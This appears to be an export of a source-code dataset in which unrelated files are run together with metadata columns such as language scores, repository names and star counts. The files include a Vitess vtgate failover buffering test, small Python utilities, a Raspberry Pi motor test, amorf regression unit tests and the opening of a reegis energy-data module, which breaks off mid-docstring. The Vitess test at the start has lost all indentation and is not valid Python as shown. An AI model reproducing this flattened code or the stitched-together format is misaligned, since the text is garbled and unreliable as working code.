# Wait 10ms seconds between two attempts.
time.sleep(0.01)
def execute(self, cursor):
raise NotImplementedError('Child class needs to implement this')
def set_notify_after_n_successful_rpcs(self, n):
with self.notify_lock:
self.notify_after_n_successful_rpcs = n
self.rpcs_so_far = self.rpcs
def stop(self):
self.quit = True
class ReadThread(AbstractVtgateThread):
def __init__(self, vtgate):
super(ReadThread, self).__init__(vtgate, 'ReadThread')
def execute(self, cursor):
row_count = cursor.execute('SELECT * FROM buffer WHERE id = :id',
{'id': CRITICAL_READ_ROW_ID})
logging.debug('read returned %d row(s).', row_count)
class UpdateThread(AbstractVtgateThread):
def __init__(self, vtgate):
super(UpdateThread, self).__init__(vtgate, 'UpdateThread', writable=True)
# Number of executed UPDATE queries.
self.i = 0
self.commit_errors = 0
def execute(self, cursor):
cursor.begin()
row_count = cursor.execute('UPDATE buffer SET msg=:msg WHERE id = :id',
{'msg': 'update %d' % self.i,
'id': UPDATE_ROW_ID})
try:
cursor.commit()
except Exception as e: # pylint: disable=broad-except
self.commit_errors += 1
if self.commit_errors > 1:
raise
logging.debug('COMMIT failed. This is okay once because we do not support'
' buffering it. err: %s', str(e))
self.i += 1
logging.debug('UPDATE affected %d row(s).', row_count)
master = tablet.Tablet()
replica = tablet.Tablet()
all_tablets = [master, replica]
def setUpModule():
try:
environment.topo_server().setup()
setup_procs = [t.init_mysql() for t in all_tablets]
utils.Vtctld().start()
utils.wait_procs(setup_procs)
utils.run_vtctl(['CreateKeyspace', KEYSPACE])
# Start tablets.
db_name = 'vt_' + KEYSPACE
for t in all_tablets:
t.create_db(db_name)
master.start_vttablet(wait_for_state=None,
init_tablet_type='replica',
init_keyspace=KEYSPACE, init_shard=SHARD,
tablet_index=0)
replica.start_vttablet(wait_for_state=None,
init_tablet_type='replica',
init_keyspace=KEYSPACE, init_shard=SHARD,
tablet_index=1)
for t in all_tablets:
t.wait_for_vttablet_state('NOT_SERVING')
# Reparent to choose an initial master and enable replication.
utils.run_vtctl(['InitShardMaster', '-force', '%s/%s' % (KEYSPACE, SHARD),
master.tablet_alias])
# Create the schema.
utils.run_vtctl(['ApplySchema', '-sql=' + SCHEMA, KEYSPACE])
start_vtgate()
# Insert two rows for the later threads (critical read, update).
with utils.vtgate.write_transaction(keyspace=KEYSPACE, shards=[SHARD],
tablet_type='master') as tx:
tx.execute('INSERT INTO buffer (id, msg) VALUES (:id, :msg)',
{'id': CRITICAL_READ_ROW_ID, 'msg': 'critical read'})
tx.execute('INSERT INTO buffer (id, msg) VALUES (:id, :msg)',
{'id': UPDATE_ROW_ID, 'msg': 'update'})
except:
tearDownModule()
raise
def tearDownModule():
utils.required_teardown()
if utils.options.skip_teardown:
return
teardown_procs = [t.teardown_mysql() for t in [master, replica]]
utils.wait_procs(teardown_procs, raise_on_error=False)
environment.topo_server().teardown()
utils.kill_sub_processes()
utils.remove_tmp_files()
for t in all_tablets:
t.remove_tree()
def start_vtgate():
utils.VtGate().start(extra_args=[
'-enable_vtgate_buffer',
# Long timeout in case failover is slow.
'-vtgate_buffer_window', '10m',
'-vtgate_buffer_max_failover_duration', '10m',
'-vtgate_buffer_min_time_between_failovers', '20m'],
tablets=all_tablets)
class TestBuffer(unittest.TestCase):
def setUp(self):
utils.vtgate.kill()
# Restart vtgate between each test or the feature
# --vtgate_buffer_min_time_between_failovers
# will ignore subsequent failovers.
start_vtgate()
def _test_buffer(self, reparent_func):
# Start both threads.
read_thread = ReadThread(utils.vtgate)
update_thread = UpdateThread(utils.vtgate)
try:
# Verify they got at least 2 RPCs through.
read_thread.set_notify_after_n_successful_rpcs(2)
update_thread.set_notify_after_n_successful_rpcs(2)
read_thread.wait_for_notification.get()
update_thread.wait_for_notification.get()
# Execute the failover.
read_thread.set_notify_after_n_successful_rpcs(10)
update_thread.set_notify_after_n_successful_rpcs(10)
reparent_func()
# Failover is done. Swap master and replica for the next test.
global master, replica
master, replica = replica, master
read_thread.wait_for_notification.get()
update_thread.wait_for_notification.get()
except:
# Something went wrong. Kill vtgate first to unblock any buffered requests
# which would further block the two threads.
utils.vtgate.kill()
raise
finally:
# Stop threads.
read_thread.stop()
update_thread.stop()
read_thread.join()
update_thread.join()
# Both threads must not see any error.
self.assertEqual(0, read_thread.errors)
self.assertEqual(0, update_thread.errors)
# At least one thread should have been buffered.
# TODO(mberlin): This may fail if a failover is too fast. Add retries then.
v = utils.vtgate.get_vars()
labels = '%s.%s' % (KEYSPACE, SHARD)
self.assertGreater(v['BufferRequestsInFlightMax'][labels], 0)
logging.debug('Failover was buffered for %d milliseconds.',
v['BufferFailoverDurationMs'][labels])
def test_buffer_planned_reparent(self):
def planned_reparent():
utils.run_vtctl(['PlannedReparentShard', '-keyspace_shard',
'%s/%s' % (KEYSPACE, SHARD),
'-new_master', replica.tablet_alias])
self._test_buffer(planned_reparent)
def test_buffer_external_reparent(self):
def external_reparent():
# Demote master.
master.mquery('', mysql_flavor().demote_master_commands())
if master.semi_sync_enabled():
master.set_semi_sync_enabled(master=False)
# Wait for replica to catch up to master.
utils.wait_for_replication_pos(master, replica)
# Promote replica to new master.
replica.mquery('', mysql_flavor().promote_slave_commands())
if replica.semi_sync_enabled():
replica.set_semi_sync_enabled(master=True)
old_master = master
new_master = replica
# Configure old master to use new master.
new_pos = mysql_flavor().master_position(new_master)
logging.debug('New master position: %s', str(new_pos))
# Use 'localhost' as hostname because Travis CI worker hostnames
# are too long for MySQL replication.
change_master_cmds = mysql_flavor().change_master_commands(
'localhost', new_master.mysql_port, new_pos)
old_master.mquery('', ['RESET SLAVE'] + change_master_cmds +
['START SLAVE'])
# Notify the new vttablet master about the reparent.
utils.run_vtctl(['TabletExternallyReparented', new_master.tablet_alias])
self._test_buffer(external_reparent)
if __name__ == '__main__':
utils.main()
| en | 0.90521 | #!/usr/bin/env python # # Copyright 2016, Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can # be found in the LICENSE file. Test the vtgate master buffer. During a master failover, vtgate should automatically buffer (stall) requests for a configured time and retry them after the failover is over. The test reproduces such a scenario as follows: - two threads constantly execute a critical read respectively a write (UPDATE) - vtctl PlannedReparentShard runs a master failover - both threads should not see any error during despite the failover CREATE TABLE buffer( id BIGINT NOT NULL, msg VARCHAR(64) NOT NULL, PRIMARY KEY (id) ) ENGINE=InnoDB Thread which constantly executes a query on vtgate. Implement the execute() method for the specific query. # Number of queries successfully executed. # Number of failed queries. # Queue used to notify the main thread that this thread executed # "self.notify_after_n_successful_rpcs" RPCs successfully. # Then "True" will be put exactly once on the queue. # notify_lock guards the two fields below. # If 0, notifications are disabled. # Number of RPCs at the time a notification was requested. # If notifications are requested, check if we already executed the # required number of successful RPCs. # Use >= instead of == because we can miss the exact point due to # slow thread scheduling. # pylint: disable=broad-except # Wait 10ms seconds between two attempts. # Number of executed UPDATE queries. # pylint: disable=broad-except # Start tablets. # Reparent to choose an initial master and enable replication. # Create the schema. # Insert two rows for the later threads (critical read, update). # Long timeout in case failover is slow. # Restart vtgate between each test or the feature # --vtgate_buffer_min_time_between_failovers # will ignore subsequent failovers. # Start both threads. # Verify they got at least 2 RPCs through. # Execute the failover. # Failover is done. 
Swap master and replica for the next test. # Something went wrong. Kill vtgate first to unblock any buffered requests # which would further block the two threads. # Stop threads. # Both threads must not see any error. # At least one thread should have been buffered. # TODO(mberlin): This may fail if a failover is too fast. Add retries then. # Demote master. # Wait for replica to catch up to master. # Promote replica to new master. # Configure old master to use new master. # Use 'localhost' as hostname because Travis CI worker hostnames # are too long for MySQL replication. # Notify the new vttablet master about the reparent. | 2.320819 | 2 |
python/Message.py | ahaque/twitch-troll-detection | 107 | 6612382 | '''
Twitch Plays Pokemon, Machine Learns Twitch
@author: <NAME>
@date: April 2014
'''
class Message(object):
    """One chat message: the sender, when it arrived, and its text."""
    # Class-level defaults; each instance overwrites them in __init__.
    value = None       # message text
    timestamp = None   # arrival time of the message
    username = None    # sender's username
    def __init__(self, username, timestamp, value):
        self.username = username
        self.timestamp = timestamp
        self.value = value | '''
Twitch Plays Pokemon, Machine Learns Twitch
@author: <NAME>
@date: April 2014
'''
class Message(object):
value = None
timestamp = None
username = None
def __init__(self, username, timestamp, value):
self.username = username
self.timestamp = timestamp
self.value = value | en | 0.594756 | Twitch Plays Pokemon, Machine Learns Twitch
@author: <NAME>
@date: April 2014 | 2.209249 | 2 |
Chapter1/C-1/21.py | GeorgeGkas/Data_Structures_and_Algorithms_in_Python | 1 | 6612383 | lines = []
# Collect lines from stdin until end-of-file (Ctrl-D / Ctrl-Z).
while True:
    try:
        read_line = input()
        lines.append(read_line)
    except EOFError:
        # input() raises EOFError once stdin is exhausted.
        break
| lines = []
while True:
try:
read_line = input()
lines.append(read_line)
except EOFError:
break
| none | 1 | 2.638783 | 3 | |
DailyProgrammer/DP20140709B.py | DayGitH/Python-Challenges | 2 | 6612384 | """
[7/9/2014] Challenge #170 [Intermediate] Rummy Checker
https://www.reddit.com/r/dailyprogrammer/comments/2a9u0a/792014_challenge_170_intermediate_rummy_checker/
# [](#IntermediateIcon) _(Intermediate)_: Rummy Checker
[Rummy](http://en.wikipedia.org/wiki/Rummy) is another very common card game. This time, the aim of the game is to
match cards together into groups (**melds**) in your hand. You continually swap cards until you have such melds, at
which point if you have a valid hand you have won. Your hand contains 7 cards, and your hand will contain 2 melds - one
that is 3 long and one that is 4 long. A meld is either:
* 3 or 4 cards of the same rank and different suit (eg. 3 jacks or 4 nines) called a **set**
* 3 or 4 cards in the same suit but increasing rank - eg. Ace, Two, Three, Four of Hearts, called a **run**
Ace is played low - ie. before 2 rather than after king.
Your challenge today is as follows. You will be given a Rummy hand of 7 cards. You will then be given another card,
that you have the choice to pick up. The challenge is to tell whether picking up the card will win you the game or not
- ie. whether picking it up will give you a winning hand. You will also need to state which card it is being replaced
with.
## Input Description
First you will be given a comma separated list of 7 cards on one line, as so:
Two of Diamonds, Three of Diamonds, Four of Diamonds, Seven of Diamonds, Seven of Clubs, Seven of Hearts, Jack of
Hearts
Next, you will be given another (**new**) card on a new line, like so:
Five of Diamonds
## Output Description
If replacing a card in your hand with the new card will give you a winning hand, print which card in your hand is being
replaced to win, for example:
Swap the new card for the Jack of Hearts to win!
Because in that case, that would give you a run (Two, Three, Four, Five of Diamonds) and a set (Seven of Diamonds,
Clubs and Hearts). In the event that picking up the new card will do nothing, print:
No possible winning hand.
# Notes
You may want to re-use some code for your card and deck structure from your solution to [this
challenge](http://www.reddit.com/r/dailyprogrammer/comments/29zut0) where appropriate.
"""
def main():
    """Entry point for the Rummy Checker challenge (solution not implemented)."""
    return None


if __name__ == "__main__":
    main()
| """
[7/9/2014] Challenge #170 [Intermediate] Rummy Checker
https://www.reddit.com/r/dailyprogrammer/comments/2a9u0a/792014_challenge_170_intermediate_rummy_checker/
# [](#IntermediateIcon) _(Intermediate)_: Rummy Checker
[Rummy](http://en.wikipedia.org/wiki/Rummy) is another very common card game. This time, the aim of the game is to
match cards together into groups (**melds**) in your hand. You continually swap cards until you have such melds, at
which point if you have a valid hand you have won. Your hand contains 7 cards, and your hand will contain 2 melds - one
that is 3 long and one that is 4 long. A meld is either:
* 3 or 4 cards of the same rank and different suit (eg. 3 jacks or 4 nines) called a **set**
* 3 or 4 cards in the same suit but increasing rank - eg. Ace, Two, Three, Four of Hearts, called a **run**
Ace is played low - ie. before 2 rather than after king.
Your challenge today is as follows. You will be given a Rummy hand of 7 cards. You will then be given another card,
that you have the choice to pick up. The challenge is to tell whether picking up the card will win you the game or not
- ie. whether picking it up will give you a winning hand. You will also need to state which card it is being replaced
with.
## Input Description
First you will be given a comma separated list of 7 cards on one line, as so:
Two of Diamonds, Three of Diamonds, Four of Diamonds, Seven of Diamonds, Seven of Clubs, Seven of Hearts, Jack of
Hearts
Next, you will be given another (**new**) card on a new line, like so:
Five of Diamonds
## Output Description
If replacing a card in your hand with the new card will give you a winning hand, print which card in your hand is being
replaced to win, for example:
Swap the new card for the Jack of Hearts to win!
Because in that case, that would give you a run (Two, Three, Four, Five of Diamonds) and a set (Seven of Diamonds,
Clubs and Hearts). In the event that picking up the new card will do nothing, print:
No possible winning hand.
# Notes
You may want to re-use some code for your card and deck structure from your solution to [this
challenge](http://www.reddit.com/r/dailyprogrammer/comments/29zut0) where appropriate.
"""
def main():
    # Placeholder: the challenge solution is not implemented yet.
    pass
if __name__ == "__main__":
    main()
| en | 0.923233 | [7/9/2014] Challenge #170 [Intermediate] Rummy Checker https://www.reddit.com/r/dailyprogrammer/comments/2a9u0a/792014_challenge_170_intermediate_rummy_checker/ # [](#IntermediateIcon) _(Intermediate)_: Rummy Checker [Rummy](http://en.wikipedia.org/wiki/Rummy) is another very common card game. This time, the aim of the game is to match cards together into groups (**melds**) in your hand. You continually swap cards until you have such melds, at which point if you have a valid hand you have won. Your hand contains 7 cards, and your hand will contain 2 melds - one that is 3 long and one that is 4 long. A meld is either: * 3 or 4 cards of the same rank and different suit (eg. 3 jacks or 4 nines) called a **set** * 3 or 4 cards in the same suit but increasing rank - eg. Ace, Two, Three, Four of Hearts, called a **run** Ace is played low - ie. before 2 rather than after king. Your challenge today is as follows. You will be given a Rummy hand of 7 cards. You will then be given another card, that you have the choice to pick up. The challenge is to tell whether picking up the card will win you the game or not - ie. whether picking it up will give you a winning hand. You will also need to state which card it is being replaced with. ## Input Description First you will be given a comma separated list of 7 cards on one line, as so: Two of Diamonds, Three of Diamonds, Four of Diamonds, Seven of Diamonds, Seven of Clubs, Seven of Hearts, Jack of Hearts Next, you will be given another (**new**) card on a new line, like so: Five of Diamonds ## Output Description If replacing a card in your hand with the new card will give you a winning hand, print which card in your hand is being replaced to win, for example: Swap the new card for the Jack of Hearts to win! Because in that case, that would give you a run (Two, Three, Four, Five of Diamonds) and a set (Seven of Diamonds, Clubs and Hearts). 
In the event that picking up the new card will do nothing, print: No possible winning hand. # Notes You may want to re-use some code for your card and deck structure from your solution to [this challenge](http://www.reddit.com/r/dailyprogrammer/comments/29zut0) where appropriate. | 3.645839 | 4 |
bin/motorsTest.py | vcollak/AutoBot | 0 | 6612385 | <gh_stars>0
""" Tests the motors using the Pololu library
The script sends forward and backward command to both motors
This script can be found: https://github.com/pololu/drv8835-motor-driver-rpi
"""
from __future__ import print_function
import time
#change path to app so we can call the vehicle class and settings
import os.path, sys
splitPath = os.path.split(os.path.dirname(os.path.realpath(__file__)))
appPath = splitPath[0]
sys.path.append(appPath)
sys.path.append(appPath + "/modules")
sys.path.append(appPath + "/settings")
from pololu_drv8835_rpi import motors, MAX_SPEED
# Set up sequences of motor speeds.
# Ramp from 0 to full speed, hold it (200 steps x 5ms sleep), ramp back to 0.
test_forward_speeds = list(range(0, MAX_SPEED, 1)) + \
    [MAX_SPEED] * 200 + list(range(MAX_SPEED, 0, -1)) + [0]
# Same profile mirrored into negative speeds.
test_reverse_speeds = list(range(0, -MAX_SPEED, -1)) + \
    [-MAX_SPEED] * 200 + list(range(-MAX_SPEED, 0, 1)) + [0]
try:
    # Ensure both motors start from a stop.
    motors.setSpeeds(0, 0)
    print("Motor 1 forward")
    # NOTE(review): both motors are driven (motor2 mirrors motor1 with the
    # opposite sign), although the messages only mention motor 1.
    for s in test_forward_speeds:
        motors.motor1.setSpeed(s)
        motors.motor2.setSpeed(-s)
        time.sleep(0.005)
    print("Motor 1 reverse")
    for s in test_reverse_speeds:
        motors.motor1.setSpeed(s)
        motors.motor2.setSpeed(-s)
        time.sleep(0.005)
finally:
    # Stop the motors, even if there is an exception
    # or the user presses Ctrl+C to kill the process.
    motors.setSpeeds(0, 0)
The script sends forward and backward command to both motors
This script can be found: https://github.com/pololu/drv8835-motor-driver-rpi
"""
from __future__ import print_function
import time
#change path to app so we can call the vehicle class and settings
import os.path, sys
splitPath = os.path.split(os.path.dirname(os.path.realpath(__file__)))
appPath = splitPath[0]
sys.path.append(appPath)
sys.path.append(appPath + "/modules")
sys.path.append(appPath + "/settings")
from pololu_drv8835_rpi import motors, MAX_SPEED
# Set up sequences of motor speeds.
test_forward_speeds = list(range(0, MAX_SPEED, 1)) + \
[MAX_SPEED] * 200 + list(range(MAX_SPEED, 0, -1)) + [0]
test_reverse_speeds = list(range(0, -MAX_SPEED, -1)) + \
[-MAX_SPEED] * 200 + list(range(-MAX_SPEED, 0, 1)) + [0]
try:
motors.setSpeeds(0, 0)
print("Motor 1 forward")
for s in test_forward_speeds:
motors.motor1.setSpeed(s)
motors.motor2.setSpeed(-s)
time.sleep(0.005)
print("Motor 1 reverse")
for s in test_reverse_speeds:
motors.motor1.setSpeed(s)
motors.motor2.setSpeed(-s)
time.sleep(0.005)
finally:
# Stop the motors, even if there is an exception
# or the user presses Ctrl+C to kill the process.
motors.setSpeeds(0, 0) | en | 0.838852 | Tests the motors using the Pololu library The script sends forward and backward command to both motors This script can be found: https://github.com/pololu/drv8835-motor-driver-rpi #change path to app so we can call the vehicle class and settings # Set up sequences of motor speeds. # Stop the motors, even if there is an exception # or the user presses Ctrl+C to kill the process. | 3.613243 | 4 |
problems/utils.py | JoshKarpel/Euler | 1 | 6612386 | <filename>problems/utils.py
import functools
def memoize(func):
    """Cache *func* results in a dict keyed by the positional-argument tuple."""
    cache = {}

    @functools.wraps(func)
    def wrapper(*args):
        # Compute and store only on a cache miss; otherwise reuse the result.
        if args not in cache:
            cache[args] = func(*args)
        return cache[args]

    return wrapper
| <filename>problems/utils.py
import functools
def memoize(func):
    """Memoize a function by storing a dictionary of {inputs: outputs}."""
    # Cache shared by all calls to the returned wrapper; keyed by the
    # positional-argument tuple, so arguments must be hashable.
    memo = {}
    @functools.wraps(func)
    def memoizer(*args):
        try:
            # Fast path (EAFP): result already cached.
            return memo[args]
        except KeyError:
            # First call with these arguments: compute, cache, return.
            memo[args] = func(*args)
            return memo[args]
    return memoizer
| en | 0.46563 | Memoize a function by storing a dictionary of {inputs: outputs}. | 3.18803 | 3 |
tests/__init__.py | ajcerejeira/auto-fmu | 1 | 6612387 | <gh_stars>1-10
"""Unit and integration tests for :py:mod:`autofmu`."""
| """Unit and integration tests for :py:mod:`autofmu`.""" | en | 0.380482 | Unit and integration tests for :py:mod:`autofmu`. | 1.2018 | 1 |
tests/test_problemTransformation.py | DSAAR/amorf | 13 | 6612388 | <gh_stars>10-100
import unittest
from amorf.problemTransformation import AutoEncoderRegression, SingleTargetMethod, _implements_SciKitLearn_API
import amorf.datasets as ds
from sklearn.model_selection import train_test_split
from sklearn.linear_model import RidgeCV
import numpy
class TestSingleTargetMethod(unittest.TestCase):
    """Unit tests for amorf.problemTransformation.SingleTargetMethod."""
    def setUp(self):
        """Load the EDM dataset and split it 90/10 into train/test."""
        X, y = ds.EDM().get_numpy()
        self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(
            X, y, test_size=0.1)
        # All built-in regressor selector keywords exercised by the tests.
        self.selectors = ['linear', 'kneighbors',
                          'adaboost', 'gradientboost', 'mlp', 'svr', 'xgb']
    def test_correct_assignment(self):
        """Every valid selector and a custom regressor yield a regressor."""
        for selector in self.selectors:
            regressor = SingleTargetMethod(selector)
            self.assertEqual(
                regressor.MORegressor._estimator_type, 'regressor')
        self.assertRaises(ValueError, SingleTargetMethod,
                          'nonexistent_selector')
        self.assertEqual(SingleTargetMethod(
            custom_regressor=RidgeCV()).MORegressor._estimator_type, 'regressor')
    def test_false_assignment(self):
        """Invalid selector/regressor combinations raise Warning/ValueError."""
        valid_estimator = RidgeCV()
        invalid_estimator = object()
        with self.assertRaises(Warning):
            SingleTargetMethod(custom_regressor=invalid_estimator)
        with self.assertRaises(ValueError):
            SingleTargetMethod("selector", custom_regressor=invalid_estimator)
        with self.assertRaises(ValueError):
            SingleTargetMethod(valid_estimator)
        with self.assertRaises(ValueError):
            SingleTargetMethod(invalid_estimator)
    def test_fit(self):
        """fit() returns a fitted regressor for every selector."""
        for selector in self.selectors:
            regressor = SingleTargetMethod(selector)
            self.assertEqual(regressor.fit(
                self.X_train, self.y_train)._estimator_type, 'regressor')
    def test_predict(self):
        """predict() returns a float ndarray of shape (n_samples, n_targets)."""
        for selector in self.selectors:
            result = SingleTargetMethod(selector).fit(
                self.X_train, self.y_train).predict(self.X_test)
            self.assertEqual(
                result.shape, (len(self.X_test), len(self.y_test[0, :])))
            self.assertTrue(type(result) is numpy.ndarray)
            self.assertTrue(result.dtype is numpy.dtype(
                'float32') or result.dtype is numpy.dtype('float64'))
    def test_custom_regressor(self):
        """A scikit-learn-compatible custom regressor works end to end."""
        valid_estimator = RidgeCV()
        invalid_estimator = object()
        stm = SingleTargetMethod(custom_regressor=valid_estimator)
        self.assertFalse(_implements_SciKitLearn_API(
            invalid_estimator))
        self.assertTrue(_implements_SciKitLearn_API(
            valid_estimator))
        result = stm.fit(
            self.X_train, self.y_train).predict(self.X_test)
        self.assertEqual(
            result.shape, (len(self.X_test), len(self.y_test[0, :])))
        self.assertTrue(type(result) is numpy.ndarray)
        self.assertTrue(result.dtype is numpy.dtype(
            'float32') or result.dtype is numpy.dtype('float64'))
    def test_score(self):
        """score() runs without raising for every selector."""
        for selector in self.selectors:
            result = SingleTargetMethod(selector).fit(
                self.X_train, self.y_train)
            # NOTE(review): the score value is computed but never asserted on;
            # this only checks that scoring does not raise.
            score = result.score(self.X_test, self.y_test)
class TestAutoEncoderRegression(unittest.TestCase):
    """Tests for AutoEncoderRegression on the EDM benchmark dataset."""

    def setUp(self):
        X, y = ds.EDM().get_numpy()
        self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(
            X, y, test_size=0.1)
        self.selectors = ['linear', 'kneighbors',
                          'adaboost', 'gradientboost', 'mlp', 'svr', 'xgb']

    def test_correct_assignment(self):
        """Every known selector and a custom regressor must build a regressor."""
        for selector in self.selectors:
            regressor = AutoEncoderRegression(selector)
            self.assertEqual(
                regressor.regressor._estimator_type, 'regressor')
        # BUGFIX: this previously asserted against SingleTargetMethod
        # (copy-paste from the other test class).
        self.assertRaises(ValueError, AutoEncoderRegression,
                          'nonexistent_selector')
        self.assertEqual(AutoEncoderRegression(
            custom_regressor=RidgeCV()).regressor._estimator_type, 'regressor')

    def test_false_assignment(self):
        """Invalid constructor arguments must raise Warning or ValueError."""
        valid_estimator = RidgeCV()
        invalid_estimator = object()
        with self.assertRaises(Warning):
            AutoEncoderRegression(custom_regressor=invalid_estimator)
        with self.assertRaises(ValueError):
            AutoEncoderRegression(
                "selector", custom_regressor=invalid_estimator)
        with self.assertRaises(ValueError):
            AutoEncoderRegression(valid_estimator)
        with self.assertRaises(ValueError):
            AutoEncoderRegression(invalid_estimator)

    def test_fit(self):
        """fit() must return the fitted wrapper with a regressor inside."""
        for selector in self.selectors:
            regressor = AutoEncoderRegression(selector)
            self.assertEqual(regressor.fit(
                self.X_train, self.y_train).regressor._estimator_type, 'regressor')

    def test_predict(self):
        """predict() must return a float ndarray of shape (n_samples, n_targets)."""
        for selector in self.selectors:
            result = AutoEncoderRegression(regressor=selector, patience=1, batch_size=10).fit(
                self.X_train, self.y_train).predict(self.X_test)
            self.assertEqual(
                result.shape, (len(self.X_test), len(self.y_test[0, :])))
            # isinstance/membership instead of identity checks.
            self.assertIsInstance(result, numpy.ndarray)
            self.assertIn(result.dtype,
                          (numpy.dtype('float32'), numpy.dtype('float64')))

    def test_custom_regressor(self):
        """A custom sklearn-compatible regressor must fit and predict correctly."""
        valid_estimator = RidgeCV()
        invalid_estimator = object()
        reg = AutoEncoderRegression(custom_regressor=valid_estimator)
        self.assertFalse(_implements_SciKitLearn_API(invalid_estimator))
        self.assertTrue(_implements_SciKitLearn_API(valid_estimator))
        result = reg.fit(
            self.X_train, self.y_train).predict(self.X_test)
        self.assertEqual(
            result.shape, (len(self.X_test), len(self.y_test[0, :])))
        self.assertIsInstance(result, numpy.ndarray)
        self.assertIn(result.dtype,
                      (numpy.dtype('float32'), numpy.dtype('float64')))

    def test_score(self):
        """score() must run for every selector and yield a value."""
        for selector in self.selectors:
            result = AutoEncoderRegression(selector).fit(
                self.X_train, self.y_train)
            score = result.score(self.X_test, self.y_test)
            # Previously `score` was computed but never checked.
            self.assertIsNotNone(score)
| import unittest
from amorf.problemTransformation import AutoEncoderRegression, SingleTargetMethod, _implements_SciKitLearn_API
import amorf.datasets as ds
from sklearn.model_selection import train_test_split
from sklearn.linear_model import RidgeCV
import numpy
class TestSingleTargetMethod(unittest.TestCase):
def setUp(self):
X, y = ds.EDM().get_numpy()
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(
X, y, test_size=0.1)
self.selectors = ['linear', 'kneighbors',
'adaboost', 'gradientboost', 'mlp', 'svr', 'xgb']
def test_correct_assignment(self):
for selector in self.selectors:
regressor = SingleTargetMethod(selector)
self.assertEqual(
regressor.MORegressor._estimator_type, 'regressor')
self.assertRaises(ValueError, SingleTargetMethod,
'nonexistent_selector')
self.assertEqual(SingleTargetMethod(
custom_regressor=RidgeCV()).MORegressor._estimator_type, 'regressor')
def test_false_assignment(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
with self.assertRaises(Warning):
SingleTargetMethod(custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
SingleTargetMethod("selector", custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
SingleTargetMethod(valid_estimator)
with self.assertRaises(ValueError):
SingleTargetMethod(invalid_estimator)
def test_fit(self):
for selector in self.selectors:
regressor = SingleTargetMethod(selector)
self.assertEqual(regressor.fit(
self.X_train, self.y_train)._estimator_type, 'regressor')
def test_predict(self):
for selector in self.selectors:
result = SingleTargetMethod(selector).fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_custom_regressor(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
stm = SingleTargetMethod(custom_regressor=valid_estimator)
self.assertFalse(_implements_SciKitLearn_API(
invalid_estimator))
self.assertTrue(_implements_SciKitLearn_API(
valid_estimator))
result = stm.fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_score(self):
for selector in self.selectors:
result = SingleTargetMethod(selector).fit(
self.X_train, self.y_train)
score = result.score(self.X_test, self.y_test)
class TestAutoEncoderRegression(unittest.TestCase):
def setUp(self):
X, y = ds.EDM().get_numpy()
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(
X, y, test_size=0.1)
self.selectors = ['linear', 'kneighbors',
'adaboost', 'gradientboost', 'mlp', 'svr', 'xgb']
def test_correct_assignment(self):
for selector in self.selectors:
regressor = AutoEncoderRegression(selector)
self.assertEqual(
regressor.regressor._estimator_type, 'regressor')
self.assertRaises(ValueError, SingleTargetMethod,
'nonexistent_selector')
self.assertEqual(AutoEncoderRegression(
custom_regressor=RidgeCV()).regressor._estimator_type, 'regressor')
def test_false_assignment(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
with self.assertRaises(Warning):
AutoEncoderRegression(custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
AutoEncoderRegression(
"selector", custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
AutoEncoderRegression(valid_estimator)
with self.assertRaises(ValueError):
AutoEncoderRegression(invalid_estimator)
def test_fit(self):
for selector in self.selectors:
regressor = AutoEncoderRegression(selector)
self.assertEqual(regressor.fit(
self.X_train, self.y_train).regressor._estimator_type, 'regressor')
def test_predict(self):
for selector in self.selectors:
result = AutoEncoderRegression(regressor=selector, patience=1, batch_size=10).fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_custom_regressor(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
reg = AutoEncoderRegression(custom_regressor=valid_estimator)
self.assertFalse(_implements_SciKitLearn_API(
invalid_estimator))
self.assertTrue(_implements_SciKitLearn_API(
valid_estimator))
result = reg.fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_score(self):
for selector in self.selectors:
result = AutoEncoderRegression(selector).fit(
self.X_train, self.y_train)
score = result.score(self.X_test, self.y_test) | none | 1 | 2.763128 | 3 | |
src/scenario_builder/data.py | reegis/scenario_builder | 2 | 6612389 | <filename>src/scenario_builder/data.py
# -*- coding: utf-8 -*-
"""General data processing for general non-reegis data.
SPDX-FileCopyrightText: 2016-2021 <NAME> <<EMAIL>>
SPDX-License-Identifier: MIT
"""
__copyright__ = "<NAME> <<EMAIL>>"
__license__ = "MIT"
import os
from types import SimpleNamespace
import pandas as pd
from reegis import config as cfg
from reegis import tools
# Maps the German fuel labels used in the EWI spreadsheet to the English
# fuel names used throughout reegis. Note several gas technologies
# (GuD, Gasturbine) collapse onto "natural gas".
TRANSLATION_FUEL = {
    "Abfall": "waste",
    "Kernenergie": "nuclear",
    "Braunkohle": "lignite",
    "Steinkohle": "hard coal",
    "Erdgas": "natural gas",
    "GuD": "natural gas",
    "Gasturbine": "natural gas",
    "Öl": "oil",
    "Sonstige": "other",
    "Emissionszertifikatspreis": "co2_price",
}
def get_ewi_data():
    """Download the EWI merit-order tool workbook and parse its cost tables.

    Downloads the xlsm file once into the reegis "general" path, then reads
    the fuel cost, transport cost, variable cost, downtime factor, emission
